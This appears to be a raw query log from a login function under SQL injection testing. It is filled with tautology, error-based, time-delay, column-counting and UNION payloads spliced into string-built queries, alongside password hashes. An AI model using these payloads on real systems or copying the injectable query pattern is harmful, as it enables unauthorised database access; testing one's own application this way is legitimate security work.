select salt from users where login = a 
select salt from users where login = s 
select salt from users where login = a or 1 = 1; 
select salt from users where login = 'a' or 1 = 1; 
select salt from users where login = 'a' or 1 =1 ; 
select salt from users where login = a or 1 =1;  
select token from users where login = a or 1 =1;  and passwd= ba36b0ba8305328771a9cbfff471e24aac88479e135ee3674f22714f7db7e0e9
select salt from users where login =  
select token from users where login =  and passwd= 47cb7c763041c8ac8c87af881a2c5bd23aa6df83b45e98564be37656f0548e3e
select salt from users where login = a 
select token from users where login = a and passwd= ba36b0ba8305328771a9cbfff471e24aac88479e135ee3674f22714f7db7e0e9
select salt from users where login = a 
select token from users where login = a and passwd= ba36b0ba8305328771a9cbfff471e24aac88479e135ee3674f22714f7db7e0e9
select salt from users where login = a 
select token from users where login = a and passwd= ba36b0ba8305328771a9cbfff471e24aac88479e135ee3674f22714f7db7e0e9
select salt from users where login = a 
select token from users where login = a and passwd= ba36b0ba8305328771a9cbfff471e24aac88479e135ee3674f22714f7db7e0e9
select salt from users where login = a 
select token from users where login = a and passwd= ba36b0ba8305328771a9cbfff471e24aac88479e135ee3674f22714f7db7e0e9
select salt from users where login = b 
select token from users where login = b and passwd= 32d79bef6ff35bd32771c4ba3106be3f2d6aeb737f5d166869a146d82cbe7295
select salt from users where login = a 
select token from users where login = a and passwd= ba36b0ba8305328771a9cbfff471e24aac88479e135ee3674f22714f7db7e0e9
select salt from users where login = a 
select token from users where login = a and passwd= ba36b0ba8305328771a9cbfff471e24aac88479e135ee3674f22714f7db7e0e9
select salt from users where login = a 
select token from users where login = a and passwd= ba36b0ba8305328771a9cbfff471e24aac88479e135ee3674f22714f7db7e0e9
select salt from users where login = a 
select token from users where login = a and passwd= ba36b0ba8305328771a9cbfff471e24aac88479e135ee3674f22714f7db7e0e9
select salt from users where login = a 
select salt from users where login = a 
select salt from users where login = a 
select token from users where login = 'a' and passwd= 'ba36b0ba8305328771a9cbfff471e24aac88479e135ee3674f22714f7db7e0e9'
select salt from users where login = a 
select token from users where login = a and passwd= ba36b0ba8305328771a9cbfff471e24aac88479e135ee3674f22714f7db7e0e9
select salt from users where login = s 
select token from users where login = s and passwd= da1e0d9e617c7d2229314d9e5b4ecfe0f4832d640312fe48a69a179a3a8c8cee
select salt from users where login = 'ss' 
select salt from users where login = 's ' or 1 = 1; #' 
select token from users where login = 's ' or 1 = 1; #' and passwd= 'ba36b0ba8305328771a9cbfff471e24aac88479e135ee3674f22714f7db7e0e9'
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '1291' 
select salt from users where login = ',.,.,).,'"' 
select token from users where login = ',.,.,).,'"' and passwd= '47cb7c763041c8ac8c87af881a2c5bd23aa6df83b45e98564be37656f0548e3e'
select salt from users where login = ''uCvxmi<'">raMAZp' 
select token from users where login = ''uCvxmi<'">raMAZp' and passwd= '47cb7c763041c8ac8c87af881a2c5bd23aa6df83b45e98564be37656f0548e3e'
select salt from users where login = ') AND 9244=5603 AND (1151=1151' 
select salt from users where login = ') AND 9404=9404 AND (4511=4511' 
select salt from users where login = ' AND 9866=6433' 
select salt from users where login = ' AND 9404=9404' 
select salt from users where login = '') AND 8377=9901 AND ('hgWU'='hgWU' 
select token from users where login = '') AND 8377=9901 AND ('hgWU'='hgWU' and passwd= '47cb7c763041c8ac8c87af881a2c5bd23aa6df83b45e98564be37656f0548e3e'
select salt from users where login = '') AND 9404=9404 AND ('SbnX'='SbnX' 
select token from users where login = '') AND 9404=9404 AND ('SbnX'='SbnX' and passwd= '47cb7c763041c8ac8c87af881a2c5bd23aa6df83b45e98564be37656f0548e3e'
select salt from users where login = '' AND 9449=4414 AND 'kDFj'='kDFj' 
select salt from users where login = '' AND 9404=9404 AND 'XAMZ'='XAMZ' 
select salt from users where login = ' AND 4076=3350-- SPLH' 
select salt from users where login = ' AND 9404=9404-- vrBb' 
select salt from users where login = '(SELECT (CASE WHEN (4020=5085) THEN '' ELSE (SELECT 5085 UNION SELECT 5240) END))' 
select salt from users where login = '(SELECT (CASE WHEN (2542=2542) THEN '' ELSE (SELECT 6577 UNION SELECT 7926) END))' 
select salt from users where login = ') AND EXTRACTVALUE(9040,CONCAT(0x5c,0x717a6a7671,(SELECT (ELT(9040=9040,1))),0x717a717871)) AND (4675=4675' 
select salt from users where login = ' AND EXTRACTVALUE(9040,CONCAT(0x5c,0x717a6a7671,(SELECT (ELT(9040=9040,1))),0x717a717871))' 
select salt from users where login = '') AND EXTRACTVALUE(9040,CONCAT(0x5c,0x717a6a7671,(SELECT (ELT(9040=9040,1))),0x717a717871)) AND ('SZoe'='SZoe' 
select token from users where login = '') AND EXTRACTVALUE(9040,CONCAT(0x5c,0x717a6a7671,(SELECT (ELT(9040=9040,1))),0x717a717871)) AND ('SZoe'='SZoe' and passwd= '47cb7c763041c8ac8c87af881a2c5bd23aa6df83b45e98564be37656f0548e3e'
select salt from users where login = '' AND EXTRACTVALUE(9040,CONCAT(0x5c,0x717a6a7671,(SELECT (ELT(9040=9040,1))),0x717a717871)) AND 'jMsM'='jMsM' 
select token from users where login = '' AND EXTRACTVALUE(9040,CONCAT(0x5c,0x717a6a7671,(SELECT (ELT(9040=9040,1))),0x717a717871)) AND 'jMsM'='jMsM' and passwd= '47cb7c763041c8ac8c87af881a2c5bd23aa6df83b45e98564be37656f0548e3e'
select salt from users where login = ' AND EXTRACTVALUE(9040,CONCAT(0x5c,0x717a6a7671,(SELECT (ELT(9040=9040,1))),0x717a717871))-- Yzda' 
select salt from users where login = ') AND 7799=CAST((CHR(113)||CHR(122)||CHR(106)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (7799=7799) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(113)||CHR(120)||CHR(113)) AS NUMERIC) AND (1454=1454' 
select salt from users where login = ' AND 7799=CAST((CHR(113)||CHR(122)||CHR(106)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (7799=7799) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(113)||CHR(120)||CHR(113)) AS NUMERIC)' 
select salt from users where login = '') AND 7799=CAST((CHR(113)||CHR(122)||CHR(106)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (7799=7799) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(113)||CHR(120)||CHR(113)) AS NUMERIC) AND ('DTii'='DTii' 
select token from users where login = '') AND 7799=CAST((CHR(113)||CHR(122)||CHR(106)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (7799=7799) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(113)||CHR(120)||CHR(113)) AS NUMERIC) AND ('DTii'='DTii' and passwd= '47cb7c763041c8ac8c87af881a2c5bd23aa6df83b45e98564be37656f0548e3e'
select salt from users where login = '' AND 7799=CAST((CHR(113)||CHR(122)||CHR(106)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (7799=7799) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(113)||CHR(120)||CHR(113)) AS NUMERIC) AND 'VGFE'='VGFE' 
select token from users where login = '' AND 7799=CAST((CHR(113)||CHR(122)||CHR(106)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (7799=7799) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(113)||CHR(120)||CHR(113)) AS NUMERIC) AND 'VGFE'='VGFE' and passwd= '47cb7c763041c8ac8c87af881a2c5bd23aa6df83b45e98564be37656f0548e3e'
select salt from users where login = ' AND 7799=CAST((CHR(113)||CHR(122)||CHR(106)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (7799=7799) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(113)||CHR(120)||CHR(113)) AS NUMERIC)-- ohKk' 
select salt from users where login = ') AND 5814 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (5814=5814) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(120)+CHAR(113))) AND (8940=8940' 
select salt from users where login = ' AND 5814 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (5814=5814) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(120)+CHAR(113)))' 
select salt from users where login = '') AND 5814 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (5814=5814) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(120)+CHAR(113))) AND ('kmWl'='kmWl' 
select token from users where login = '') AND 5814 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (5814=5814) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(120)+CHAR(113))) AND ('kmWl'='kmWl' and passwd= '47cb7c763041c8ac8c87af881a2c5bd23aa6df83b45e98564be37656f0548e3e'
select salt from users where login = '' AND 5814 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (5814=5814) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(120)+CHAR(113))) AND 'OyQc'='OyQc' 
select salt from users where login = ' AND 5814 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (5814=5814) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(120)+CHAR(113)))-- Ujaj' 
select salt from users where login = ') AND 8331=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(106)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (8331=8331) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(113)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) AND (1115=1115' 
select salt from users where login = ' AND 8331=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(106)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (8331=8331) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(113)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL)' 
select salt from users where login = '') AND 8331=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(106)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (8331=8331) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(113)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) AND ('DIVj'='DIVj' 
select token from users where login = '') AND 8331=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(106)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (8331=8331) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(113)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) AND ('DIVj'='DIVj' and passwd= '47cb7c763041c8ac8c87af881a2c5bd23aa6df83b45e98564be37656f0548e3e'
select salt from users where login = '' AND 8331=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(106)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (8331=8331) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(113)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) AND 'eQwe'='eQwe' 
select token from users where login = '' AND 8331=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(106)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (8331=8331) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(113)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) AND 'eQwe'='eQwe' and passwd= '47cb7c763041c8ac8c87af881a2c5bd23aa6df83b45e98564be37656f0548e3e'
select salt from users where login = ' AND 8331=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(106)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (8331=8331) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(113)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL)-- HGrQ' 
select salt from users where login = '(SELECT CONCAT(CONCAT('qzjvq',(CASE WHEN (2595=2595) THEN '1' ELSE '0' END)),'qzqxq'))' 
select token from users where login = '(SELECT CONCAT(CONCAT('qzjvq',(CASE WHEN (2595=2595) THEN '1' ELSE '0' END)),'qzqxq'))' and passwd= '47cb7c763041c8ac8c87af881a2c5bd23aa6df83b45e98564be37656f0548e3e'
select salt from users where login = ');SELECT PG_SLEEP(5)--' 
select salt from users where login = ';SELECT PG_SLEEP(5)--' 
select salt from users where login = '');SELECT PG_SLEEP(5)--' 
select token from users where login = '');SELECT PG_SLEEP(5)--' and passwd= '47cb7c763041c8ac8c87af881a2c5bd23aa6df83b45e98564be37656f0548e3e'
select salt from users where login = '';SELECT PG_SLEEP(5)--' 
select token from users where login = '';SELECT PG_SLEEP(5)--' and passwd= '47cb7c763041c8ac8c87af881a2c5bd23aa6df83b45e98564be37656f0548e3e'
select salt from users where login = ');WAITFOR DELAY '0:0:5'--' 
select token from users where login = ');WAITFOR DELAY '0:0:5'--' and passwd= '47cb7c763041c8ac8c87af881a2c5bd23aa6df83b45e98564be37656f0548e3e'
select salt from users where login = ';WAITFOR DELAY '0:0:5'--' 
select token from users where login = ';WAITFOR DELAY '0:0:5'--' and passwd= '47cb7c763041c8ac8c87af881a2c5bd23aa6df83b45e98564be37656f0548e3e'
select salt from users where login = '');WAITFOR DELAY '0:0:5'--' 
select token from users where login = '');WAITFOR DELAY '0:0:5'--' and passwd= '47cb7c763041c8ac8c87af881a2c5bd23aa6df83b45e98564be37656f0548e3e'
select salt from users where login = '';WAITFOR DELAY '0:0:5'--' 
select token from users where login = '';WAITFOR DELAY '0:0:5'--' and passwd= '47cb7c763041c8ac8c87af881a2c5bd23aa6df83b45e98564be37656f0548e3e'
select salt from users where login = ');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(113)||CHR(99)||CHR(101)||CHR(111),5) FROM DUAL--' 
select salt from users where login = ';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(113)||CHR(99)||CHR(101)||CHR(111),5) FROM DUAL--' 
select salt from users where login = '');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(113)||CHR(99)||CHR(101)||CHR(111),5) FROM DUAL--' 
select token from users where login = '');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(113)||CHR(99)||CHR(101)||CHR(111),5) FROM DUAL--' and passwd= '47cb7c763041c8ac8c87af881a2c5bd23aa6df83b45e98564be37656f0548e3e'
select salt from users where login = '';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(113)||CHR(99)||CHR(101)||CHR(111),5) FROM DUAL--' 
select token from users where login = '';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(113)||CHR(99)||CHR(101)||CHR(111),5) FROM DUAL--' and passwd= '47cb7c763041c8ac8c87af881a2c5bd23aa6df83b45e98564be37656f0548e3e'
select salt from users where login = ') AND (SELECT 7891 FROM (SELECT(SLEEP(5)))oJda) AND (5605=5605' 
select salt from users where login = ' AND (SELECT 7891 FROM (SELECT(SLEEP(5)))oJda)' 
select salt from users where login = '') AND (SELECT 7891 FROM (SELECT(SLEEP(5)))oJda) AND ('NGrQ'='NGrQ' 
select token from users where login = '') AND (SELECT 7891 FROM (SELECT(SLEEP(5)))oJda) AND ('NGrQ'='NGrQ' and passwd= '47cb7c763041c8ac8c87af881a2c5bd23aa6df83b45e98564be37656f0548e3e'
select salt from users where login = '' AND (SELECT 7891 FROM (SELECT(SLEEP(5)))oJda) AND 'EGaz'='EGaz' 
select salt from users where login = '' AND (SELECT 7891 FROM (SELECT(SLEEP(0)))oJda) AND 'EGaz'='EGaz' 
select salt from users where login = '' AND (SELECT 7891 FROM (SELECT(SLEEP(5)))oJda) AND 'EGaz'='EGaz' 
select salt from users where login = '' ORDER BY 1-- -' 
select salt from users where login = '' ORDER BY 5281-- -' 
select token from users where login = '' ORDER BY 5281-- -' and passwd= '47cb7c763041c8ac8c87af881a2c5bd23aa6df83b45e98564be37656f0548e3e'
select salt from users where login = '' ORDER BY 10-- -' 
select token from users where login = '' ORDER BY 10-- -' and passwd= '47cb7c763041c8ac8c87af881a2c5bd23aa6df83b45e98564be37656f0548e3e'
select salt from users where login = '' ORDER BY 6-- -' 
select token from users where login = '' ORDER BY 6-- -' and passwd= '47cb7c763041c8ac8c87af881a2c5bd23aa6df83b45e98564be37656f0548e3e'
select salt from users where login = '' ORDER BY 4-- -' 
select token from users where login = '' ORDER BY 4-- -' and passwd= '47cb7c763041c8ac8c87af881a2c5bd23aa6df83b45e98564be37656f0548e3e'
select salt from users where login = '' ORDER BY 3-- -' 
select token from users where login = '' ORDER BY 3-- -' and passwd= '47cb7c763041c8ac8c87af881a2c5bd23aa6df83b45e98564be37656f0548e3e'
select salt from users where login = '' ORDER BY 2-- -' 
select token from users where login = '' ORDER BY 2-- -' and passwd= '47cb7c763041c8ac8c87af881a2c5bd23aa6df83b45e98564be37656f0548e3e'
select salt from users where login = '' UNION ALL SELECT CONCAT(0x717a6a7671,0x78477a795452696c5a4c7a6c5348465364434973724777516c6566744b4844546668626a726f4b50,0x717a717871)-- -' 
select token from users where login = '' UNION ALL SELECT CONCAT(0x717a6a7671,0x78477a795452696c5a4c7a6c5348465364434973724777516c6566744b4844546668626a726f4b50,0x717a717871)-- -' and passwd= '47cb7c763041c8ac8c87af881a2c5bd23aa6df83b45e98564be37656f0548e3e'
select salt from users where login = '' UNION ALL SELECT CONCAT(0x717a6a7671,0x78477a795452696c5a4c7a6c5348465364434973724777516c6566744b4844546668626a726f4b50,0x717a717871) UNION ALL SELECT CONCAT(0x717a6a7671,0x6f467a794e79634b6a51545a426c715a6c785059727574424a5574736675466c684c504f43656876,0x717a717871)-- -' 
select token from users where login = '' UNION ALL SELECT CONCAT(0x717a6a7671,0x78477a795452696c5a4c7a6c5348465364434973724777516c6566744b4844546668626a726f4b50,0x717a717871) UNION ALL SELECT CONCAT(0x717a6a7671,0x6f467a794e79634b6a51545a426c715a6c785059727574424a5574736675466c684c504f43656876,0x717a717871)-- -' and passwd= '47cb7c763041c8ac8c87af881a2c5bd23aa6df83b45e98564be37656f0548e3e'
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' UNION ALL SELECT CONCAT(0x717a6a7671,(CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END),0x717a717871)-- -' 
select token from users where login = '' UNION ALL SELECT CONCAT(0x717a6a7671,(CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END),0x717a717871)-- -' and passwd= '47cb7c763041c8ac8c87af881a2c5bd23aa6df83b45e98564be37656f0548e3e'
select salt from users where login = '' 
select salt from users where login = ' a' or 1 =1; #' 
select token from users where login = ' a' or 1 =1; #' and passwd= '47cb7c763041c8ac8c87af881a2c5bd23aa6df83b45e98564be37656f0548e3e'
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = 'a' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' 
select salt from users where login = '' or 1 = 1; #' 
select token from users where login = '' or 1 = 1; #' and passwd= '47cb7c763041c8ac8c87af881a2c5bd23aa6df83b45e98564be37656f0548e3e'
select salt from users where login = '' or 1 =1 ; #' 
select token from users where login = '' or 1 =1 ; #' and passwd= '47cb7c763041c8ac8c87af881a2c5bd23aa6df83b45e98564be37656f0548e3e'
